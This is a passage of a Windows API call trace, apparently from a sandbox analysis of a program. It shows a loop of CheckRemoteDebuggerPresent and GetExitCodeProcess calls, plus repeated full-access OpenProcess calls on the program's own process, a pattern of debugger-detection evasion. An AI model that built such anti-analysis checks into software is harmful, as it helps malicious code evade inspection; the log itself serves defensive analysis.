pbDebuggerPresent=0x4dd3b0) returned 1 [0175.249] GetExitCodeProcess (in: hProcess=0x5b4, lpExitCode=0x226bab0 | out: lpExitCode=0x226bab0*=0x103) returned 1 [0175.249] CheckRemoteDebuggerPresent (in: hProcess=0x5b4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.249] GetExitCodeProcess (in: hProcess=0x5b8, lpExitCode=0x226bb68 | out: lpExitCode=0x226bb68*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5b8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5bc, lpExitCode=0x226bc20 | out: lpExitCode=0x226bc20*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5bc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5c0, lpExitCode=0x226bcd8 | out: lpExitCode=0x226bcd8*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5c0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5c4, lpExitCode=0x226bd90 | out: lpExitCode=0x226bd90*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5c4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5c8, lpExitCode=0x226be48 | out: lpExitCode=0x226be48*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5c8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5cc, lpExitCode=0x226bf00 | out: lpExitCode=0x226bf00*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5cc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5d0, lpExitCode=0x226bfb8 | out: lpExitCode=0x226bfb8*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5d0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.250] GetExitCodeProcess (in: hProcess=0x5d4, lpExitCode=0x226c070 | out: lpExitCode=0x226c070*=0x103) returned 1 [0175.250] CheckRemoteDebuggerPresent (in: hProcess=0x5d4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.251] GetExitCodeProcess (in: hProcess=0x5d8, lpExitCode=0x226c128 | out: lpExitCode=0x226c128*=0x103) returned 1 [0175.251] CheckRemoteDebuggerPresent (in: hProcess=0x5d8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.251] GetExitCodeProcess (in: hProcess=0x5dc, lpExitCode=0x226c1e0 | out: lpExitCode=0x226c1e0*=0x103) returned 1 [0175.251] CheckRemoteDebuggerPresent (in: hProcess=0x5dc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.251] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x5e0 [0175.251] GetExitCodeProcess (in: hProcess=0x5e0, lpExitCode=0x226c298 | out: lpExitCode=0x226c298*=0x103) returned 1 [0175.251] CheckRemoteDebuggerPresent (in: hProcess=0x5e0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.251] GetExitCodeProcess (in: hProcess=0x5e4, lpExitCode=0x226c350 | out: lpExitCode=0x226c350*=0x103) returned 1 [0175.251] CheckRemoteDebuggerPresent (in: hProcess=0x5e4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.251] GetExitCodeProcess (in: hProcess=0x5e8, lpExitCode=0x226c408 | out: lpExitCode=0x226c408*=0x103) returned 1 [0175.252] CheckRemoteDebuggerPresent (in: hProcess=0x5e8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.252] GetExitCodeProcess (in: hProcess=0x5ec, lpExitCode=0x226c4c0 | out: lpExitCode=0x226c4c0*=0x103) returned 1 [0175.252] CheckRemoteDebuggerPresent (in: hProcess=0x5ec, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.252] GetExitCodeProcess (in: hProcess=0x5f0, lpExitCode=0x226c578 | out: lpExitCode=0x226c578*=0x103) returned 1 [0175.252] CheckRemoteDebuggerPresent (in: hProcess=0x5f0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.252] GetExitCodeProcess (in: hProcess=0x5f4, lpExitCode=0x226c630 | out: lpExitCode=0x226c630*=0x103) returned 1 [0175.252] CheckRemoteDebuggerPresent (in: hProcess=0x5f4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.252] GetExitCodeProcess (in: hProcess=0x5f8, lpExitCode=0x226c6e8 | out: lpExitCode=0x226c6e8*=0x103) returned 1 [0175.252] CheckRemoteDebuggerPresent (in: hProcess=0x5f8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.252] GetExitCodeProcess (in: hProcess=0x5fc, lpExitCode=0x226c7a0 | out: lpExitCode=0x226c7a0*=0x103) returned 1 [0175.252] CheckRemoteDebuggerPresent (in: hProcess=0x5fc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.252] GetExitCodeProcess (in: hProcess=0x600, lpExitCode=0x226c858 | out: lpExitCode=0x226c858*=0x103) returned 1 [0175.253] CheckRemoteDebuggerPresent (in: hProcess=0x600, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.253] GetExitCodeProcess (in: hProcess=0x604, lpExitCode=0x226c910 | out: lpExitCode=0x226c910*=0x103) returned 1 [0175.253] CheckRemoteDebuggerPresent (in: hProcess=0x604, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.253] GetExitCodeProcess (in: hProcess=0x608, lpExitCode=0x226c9c8 | out: lpExitCode=0x226c9c8*=0x103) returned 1 [0175.253] CheckRemoteDebuggerPresent (in: hProcess=0x608, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.253] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x60c [0175.253] GetExitCodeProcess (in: hProcess=0x60c, lpExitCode=0x226ca80 | out: lpExitCode=0x226ca80*=0x103) returned 1 [0175.253] CheckRemoteDebuggerPresent (in: hProcess=0x60c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.253] GetExitCodeProcess (in: hProcess=0x610, lpExitCode=0x226cb38 | out: lpExitCode=0x226cb38*=0x103) returned 1 [0175.253] CheckRemoteDebuggerPresent (in: hProcess=0x610, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.253] GetExitCodeProcess (in: hProcess=0x614, lpExitCode=0x226cbf0 | out: lpExitCode=0x226cbf0*=0x103) returned 1 [0175.254] CheckRemoteDebuggerPresent (in: hProcess=0x614, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.254] GetExitCodeProcess (in: hProcess=0x618, lpExitCode=0x226cca8 | out: lpExitCode=0x226cca8*=0x103) returned 1 [0175.254] CheckRemoteDebuggerPresent (in: hProcess=0x618, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.254] GetExitCodeProcess (in: hProcess=0x61c, lpExitCode=0x226cd60 | out: lpExitCode=0x226cd60*=0x103) returned 1 [0175.254] CheckRemoteDebuggerPresent (in: hProcess=0x61c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.254] GetExitCodeProcess (in: hProcess=0x620, lpExitCode=0x226ce18 | out: lpExitCode=0x226ce18*=0x103) returned 1 [0175.254] CheckRemoteDebuggerPresent (in: hProcess=0x620, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.254] GetExitCodeProcess (in: hProcess=0x624, lpExitCode=0x226ced0 | out: lpExitCode=0x226ced0*=0x103) returned 1 [0175.254] CheckRemoteDebuggerPresent (in: hProcess=0x624, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.254] GetExitCodeProcess (in: hProcess=0x628, lpExitCode=0x226cf88 | out: lpExitCode=0x226cf88*=0x103) returned 1 [0175.254] CheckRemoteDebuggerPresent (in: hProcess=0x628, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.255] GetExitCodeProcess (in: hProcess=0x62c, lpExitCode=0x226d040 | out: lpExitCode=0x226d040*=0x103) returned 1 [0175.255] CheckRemoteDebuggerPresent (in: hProcess=0x62c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.255] GetExitCodeProcess (in: hProcess=0x630, lpExitCode=0x226d0f8 | out: lpExitCode=0x226d0f8*=0x103) returned 1 [0175.255] CheckRemoteDebuggerPresent (in: hProcess=0x630, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.255] GetExitCodeProcess (in: hProcess=0x634, lpExitCode=0x226d1b0 | out: lpExitCode=0x226d1b0*=0x103) returned 1 [0175.255] CheckRemoteDebuggerPresent (in: hProcess=0x634, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.255] GetExitCodeProcess (in: hProcess=0x638, lpExitCode=0x226d268 | out: lpExitCode=0x226d268*=0x103) returned 1 [0175.255] CheckRemoteDebuggerPresent (in: hProcess=0x638, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.255] GetExitCodeProcess (in: hProcess=0x63c, lpExitCode=0x226d320 | out: lpExitCode=0x226d320*=0x103) returned 1 [0175.255] CheckRemoteDebuggerPresent (in: hProcess=0x63c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.256] GetExitCodeProcess (in: hProcess=0x640, lpExitCode=0x226d3d8 | out: lpExitCode=0x226d3d8*=0x103) returned 1 [0175.256] CheckRemoteDebuggerPresent (in: hProcess=0x640, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.256] GetExitCodeProcess (in: hProcess=0x644, lpExitCode=0x226d490 | out: lpExitCode=0x226d490*=0x103) returned 1 [0175.256] CheckRemoteDebuggerPresent (in: hProcess=0x644, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.256] GetExitCodeProcess (in: hProcess=0x648, lpExitCode=0x226d548 | out: lpExitCode=0x226d548*=0x103) returned 1 [0175.256] CheckRemoteDebuggerPresent (in: hProcess=0x648, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.256] GetExitCodeProcess (in: hProcess=0x64c, lpExitCode=0x226d600 | out: lpExitCode=0x226d600*=0x103) returned 1 [0175.256] CheckRemoteDebuggerPresent (in: hProcess=0x64c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.256] GetExitCodeProcess (in: hProcess=0x650, lpExitCode=0x226d6b8 | out: lpExitCode=0x226d6b8*=0x103) returned 1 [0175.256] CheckRemoteDebuggerPresent (in: hProcess=0x650, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.256] GetExitCodeProcess (in: hProcess=0x654, lpExitCode=0x226d770 | out: lpExitCode=0x226d770*=0x103) returned 1 [0175.257] CheckRemoteDebuggerPresent (in: hProcess=0x654, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.257] GetExitCodeProcess (in: hProcess=0x658, lpExitCode=0x226d828 | out: lpExitCode=0x226d828*=0x103) returned 1 [0175.257] CheckRemoteDebuggerPresent (in: hProcess=0x658, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.257] GetExitCodeProcess (in: hProcess=0x65c, lpExitCode=0x226d8e0 | out: lpExitCode=0x226d8e0*=0x103) returned 1 [0175.257] CheckRemoteDebuggerPresent (in: hProcess=0x65c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.257] GetExitCodeProcess (in: hProcess=0x660, lpExitCode=0x226d998 | out: lpExitCode=0x226d998*=0x103) returned 1 [0175.257] CheckRemoteDebuggerPresent (in: hProcess=0x660, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.257] GetExitCodeProcess (in: hProcess=0x664, lpExitCode=0x226da50 | out: lpExitCode=0x226da50*=0x103) returned 1 [0175.257] CheckRemoteDebuggerPresent (in: hProcess=0x664, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.257] GetExitCodeProcess (in: hProcess=0x668, lpExitCode=0x226db08 | out: lpExitCode=0x226db08*=0x103) returned 1 [0175.257] CheckRemoteDebuggerPresent (in: hProcess=0x668, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.258] GetExitCodeProcess (in: hProcess=0x66c, lpExitCode=0x226dbc0 | out: lpExitCode=0x226dbc0*=0x103) returned 1 [0175.258] CheckRemoteDebuggerPresent (in: hProcess=0x66c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.258] GetExitCodeProcess (in: hProcess=0x670, lpExitCode=0x226dc78 | out: lpExitCode=0x226dc78*=0x103) returned 1 [0175.258] CheckRemoteDebuggerPresent (in: hProcess=0x670, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.258] GetExitCodeProcess (in: hProcess=0x674, lpExitCode=0x226dd30 | out: lpExitCode=0x226dd30*=0x103) returned 1 [0175.258] CheckRemoteDebuggerPresent (in: hProcess=0x674, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.258] GetExitCodeProcess (in: hProcess=0x678, lpExitCode=0x226dde8 | out: lpExitCode=0x226dde8*=0x103) returned 1 [0175.258] CheckRemoteDebuggerPresent (in: hProcess=0x678, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.258] GetExitCodeProcess (in: hProcess=0x67c, lpExitCode=0x226dea0 | out: lpExitCode=0x226dea0*=0x103) returned 1 [0175.258] CheckRemoteDebuggerPresent (in: hProcess=0x67c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.259] GetExitCodeProcess (in: hProcess=0x680, lpExitCode=0x226df58 | out: lpExitCode=0x226df58*=0x103) returned 1 [0175.259] CheckRemoteDebuggerPresent (in: hProcess=0x680, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.259] GetExitCodeProcess (in: hProcess=0x684, lpExitCode=0x226e010 | out: lpExitCode=0x226e010*=0x103) returned 1 [0175.259] CheckRemoteDebuggerPresent (in: hProcess=0x684, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.259] GetExitCodeProcess (in: hProcess=0x688, lpExitCode=0x226e0c8 | out: lpExitCode=0x226e0c8*=0x103) returned 1 [0175.259] CheckRemoteDebuggerPresent (in: hProcess=0x688, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.259] GetExitCodeProcess (in: hProcess=0x68c, lpExitCode=0x226e180 | out: lpExitCode=0x226e180*=0x103) returned 1 [0175.259] CheckRemoteDebuggerPresent (in: hProcess=0x68c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.259] GetExitCodeProcess (in: hProcess=0x690, lpExitCode=0x226e238 | out: lpExitCode=0x226e238*=0x103) returned 1 [0175.259] CheckRemoteDebuggerPresent (in: hProcess=0x690, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.259] GetCurrentProcessId () returned 0x678 [0175.260] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x694 [0175.260] GetExitCodeProcess (in: hProcess=0x694, lpExitCode=0x226e2f0 | out: lpExitCode=0x226e2f0*=0x103) returned 1 [0175.260] CheckRemoteDebuggerPresent (in: hProcess=0x694, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.260] GetExitCodeProcess (in: hProcess=0x698, lpExitCode=0x226e3a8 | out: lpExitCode=0x226e3a8*=0x103) returned 1 [0175.260] CheckRemoteDebuggerPresent (in: hProcess=0x698, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.260] GetExitCodeProcess (in: hProcess=0x69c, lpExitCode=0x226e460 | out: lpExitCode=0x226e460*=0x103) returned 1 [0175.260] CheckRemoteDebuggerPresent (in: hProcess=0x69c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.260] GetExitCodeProcess (in: hProcess=0x6a0, lpExitCode=0x226e518 | out: lpExitCode=0x226e518*=0x103) returned 1 [0175.260] CheckRemoteDebuggerPresent (in: hProcess=0x6a0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.260] GetExitCodeProcess (in: hProcess=0x6a4, lpExitCode=0x226e5d0 | out: lpExitCode=0x226e5d0*=0x103) returned 1 [0175.260] CheckRemoteDebuggerPresent (in: hProcess=0x6a4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.261] GetExitCodeProcess (in: hProcess=0x6a8, lpExitCode=0x226e688 | out: lpExitCode=0x226e688*=0x103) returned 1 [0175.261] CheckRemoteDebuggerPresent (in: hProcess=0x6a8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.261] GetExitCodeProcess (in: hProcess=0x6ac, lpExitCode=0x226e740 | out: lpExitCode=0x226e740*=0x103) returned 1 [0175.261] CheckRemoteDebuggerPresent (in: hProcess=0x6ac, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.261] GetExitCodeProcess (in: hProcess=0x6b0, lpExitCode=0x226e7f8 | out: lpExitCode=0x226e7f8*=0x103) returned 1 [0175.261] CheckRemoteDebuggerPresent (in: hProcess=0x6b0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.261] GetExitCodeProcess (in: hProcess=0x6b4, lpExitCode=0x226e8b0 | out: lpExitCode=0x226e8b0*=0x103) returned 1 [0175.261] CheckRemoteDebuggerPresent (in: hProcess=0x6b4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.261] GetExitCodeProcess (in: hProcess=0x6b8, lpExitCode=0x226e968 | out: lpExitCode=0x226e968*=0x103) returned 1 [0175.261] CheckRemoteDebuggerPresent (in: hProcess=0x6b8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.261] GetExitCodeProcess (in: hProcess=0x6bc, lpExitCode=0x226ea20 | out: lpExitCode=0x226ea20*=0x103) returned 1 [0175.262] CheckRemoteDebuggerPresent (in: hProcess=0x6bc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.262] GetExitCodeProcess (in: hProcess=0x6c0, lpExitCode=0x226ead8 | out: lpExitCode=0x226ead8*=0x103) returned 1 [0175.262] CheckRemoteDebuggerPresent (in: hProcess=0x6c0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.262] GetExitCodeProcess (in: hProcess=0x6c4, lpExitCode=0x226eb90 | out: lpExitCode=0x226eb90*=0x103) returned 1 [0175.262] CheckRemoteDebuggerPresent (in: hProcess=0x6c4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.262] GetExitCodeProcess (in: hProcess=0x6c8, lpExitCode=0x226ec48 | out: lpExitCode=0x226ec48*=0x103) returned 1 [0175.262] CheckRemoteDebuggerPresent (in: hProcess=0x6c8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.262] GetExitCodeProcess (in: hProcess=0x6cc, lpExitCode=0x226ed00 | out: lpExitCode=0x226ed00*=0x103) returned 1 [0175.262] CheckRemoteDebuggerPresent (in: hProcess=0x6cc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.262] GetExitCodeProcess (in: hProcess=0x6d0, lpExitCode=0x226edb8 | out: lpExitCode=0x226edb8*=0x103) returned 1 [0175.263] CheckRemoteDebuggerPresent (in: hProcess=0x6d0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.263] GetExitCodeProcess (in: hProcess=0x6d4, lpExitCode=0x226ee70 | out: lpExitCode=0x226ee70*=0x103) returned 1 [0175.263] CheckRemoteDebuggerPresent (in: hProcess=0x6d4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.263] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x6d8 [0175.263] GetExitCodeProcess (in: hProcess=0x6d8, lpExitCode=0x226ef28 | out: lpExitCode=0x226ef28*=0x103) returned 1 [0175.263] CheckRemoteDebuggerPresent (in: hProcess=0x6d8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.263] GetExitCodeProcess (in: hProcess=0x6dc, lpExitCode=0x226efe0 | out: lpExitCode=0x226efe0*=0x103) returned 1 [0175.263] CheckRemoteDebuggerPresent (in: hProcess=0x6dc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.263] GetExitCodeProcess (in: hProcess=0x6e0, lpExitCode=0x226f098 | out: lpExitCode=0x226f098*=0x103) returned 1 [0175.263] CheckRemoteDebuggerPresent (in: hProcess=0x6e0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.263] GetExitCodeProcess (in: hProcess=0x6e4, lpExitCode=0x226f150 | out: lpExitCode=0x226f150*=0x103) returned 1 [0175.264] CheckRemoteDebuggerPresent (in: hProcess=0x6e4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.264] GetExitCodeProcess (in: hProcess=0x6e8, lpExitCode=0x226f208 | out: lpExitCode=0x226f208*=0x103) returned 1 [0175.264] CheckRemoteDebuggerPresent (in: hProcess=0x6e8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.264] GetExitCodeProcess (in: hProcess=0x6ec, lpExitCode=0x226f2c0 | out: lpExitCode=0x226f2c0*=0x103) returned 1 [0175.264] CheckRemoteDebuggerPresent (in: hProcess=0x6ec, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.264] GetExitCodeProcess (in: hProcess=0x6f0, lpExitCode=0x226f378 | out: lpExitCode=0x226f378*=0x103) returned 1 [0175.264] CheckRemoteDebuggerPresent (in: hProcess=0x6f0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.264] GetExitCodeProcess (in: hProcess=0x6f4, lpExitCode=0x226f430 | out: lpExitCode=0x226f430*=0x103) returned 1 [0175.264] CheckRemoteDebuggerPresent (in: hProcess=0x6f4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.264] GetExitCodeProcess (in: hProcess=0x6f8, lpExitCode=0x226f4e8 | out: lpExitCode=0x226f4e8*=0x103) returned 1 [0175.265] CheckRemoteDebuggerPresent (in: hProcess=0x6f8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.265] GetExitCodeProcess (in: hProcess=0x6fc, lpExitCode=0x226f5a0 | out: lpExitCode=0x226f5a0*=0x103) returned 1 [0175.265] CheckRemoteDebuggerPresent (in: hProcess=0x6fc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.265] GetExitCodeProcess (in: hProcess=0x700, lpExitCode=0x226f658 | out: lpExitCode=0x226f658*=0x103) returned 1 [0175.265] CheckRemoteDebuggerPresent (in: hProcess=0x700, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.265] GetExitCodeProcess (in: hProcess=0x704, lpExitCode=0x226f710 | out: lpExitCode=0x226f710*=0x103) returned 1 [0175.265] CheckRemoteDebuggerPresent (in: hProcess=0x704, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.265] GetExitCodeProcess (in: hProcess=0x708, lpExitCode=0x226f7c8 | out: lpExitCode=0x226f7c8*=0x103) returned 1 [0175.265] CheckRemoteDebuggerPresent (in: hProcess=0x708, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.265] GetExitCodeProcess (in: hProcess=0x70c, lpExitCode=0x226f880 | out: lpExitCode=0x226f880*=0x103) returned 1 [0175.265] CheckRemoteDebuggerPresent (in: hProcess=0x70c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.266] GetExitCodeProcess (in: hProcess=0x710, lpExitCode=0x226f938 | out: lpExitCode=0x226f938*=0x103) returned 1 [0175.266] CheckRemoteDebuggerPresent (in: hProcess=0x710, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.266] GetExitCodeProcess (in: hProcess=0x714, lpExitCode=0x226f9f0 | out: lpExitCode=0x226f9f0*=0x103) returned 1 [0175.266] CheckRemoteDebuggerPresent (in: hProcess=0x714, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.266] GetExitCodeProcess (in: hProcess=0x718, lpExitCode=0x226faa8 | out: lpExitCode=0x226faa8*=0x103) returned 1 [0175.267] CheckRemoteDebuggerPresent (in: hProcess=0x718, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.267] GetExitCodeProcess (in: hProcess=0x71c, lpExitCode=0x226fb60 | out: lpExitCode=0x226fb60*=0x103) returned 1 [0175.267] CheckRemoteDebuggerPresent (in: hProcess=0x71c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.267] GetExitCodeProcess (in: hProcess=0x720, lpExitCode=0x226fc18 | out: lpExitCode=0x226fc18*=0x103) returned 1 [0175.267] CheckRemoteDebuggerPresent (in: hProcess=0x720, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.267] GetCurrentProcessId () returned 0x678 [0175.267] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x748 [0175.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x7cc [0175.268] GetCurrentProcessId () returned 0x678 [0175.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x7f8 [0175.268] GetCurrentProcessId () returned 0x678 [0175.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x8b0 [0175.269] GetCurrentProcessId () returned 0x678 [0175.269] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x8f8 [0175.269] GetCurrentProcessId () returned 0x678 [0175.269] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x960 [0175.269] GetCurrentProcessId () returned 0x678 [0175.269] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xa14 [0175.269] GetCurrentProcessId () returned 0x678 [0175.269] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xa58 [0175.270] GetCurrentProcessId () returned 0x678 [0175.270] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xac4 [0175.270] 